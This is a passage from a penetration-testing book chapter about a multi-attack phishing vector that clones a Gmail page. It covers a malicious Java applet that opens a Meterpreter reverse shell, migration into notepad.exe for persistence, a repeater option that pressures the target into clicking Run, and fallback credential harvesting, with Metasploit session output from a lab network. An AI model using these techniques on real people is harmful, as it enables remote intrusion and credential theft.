background image

156

Chapter 10

Figure 10-6: Multi-attack security warning

We have a backup attack, however. The target clicks Run on the mali-

cious Java applet, a Meterpreter shell begins, and the target is redirected 
back to the original Gmail page. The attack is successful.

Notice that when using the Java applet, we automatically migrate to a sep-

arate thread (process) that happens to be 

notepad.exe

. Because of this, if the 

target closes the browser, our attack will continue because the process won’t 
terminate our Meterpreter shell. Also, within the configuration file you can 
set the “Java Repeater” option, which will continue to prompt the target 
with the Java applet warning even if he clicks Cancel. This makes it more 
likely that the target will click the Run button.

The Meterpreter shell is presented to us once a successful exploit is per-

formed, as shown below.

[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at 

Thu Sep 09 12:33:20 -0400 2010

[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing 

InitialAutoRunScript 'migrate -f'

[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >

Now let’s say that this attack fails, and the target clicks Cancel (without 

the repeater option enabled). He would then be prompted to enter his user-
name and password into the username and password fields, allowing you to 
successfully harvest the credentials on the website and still have a successful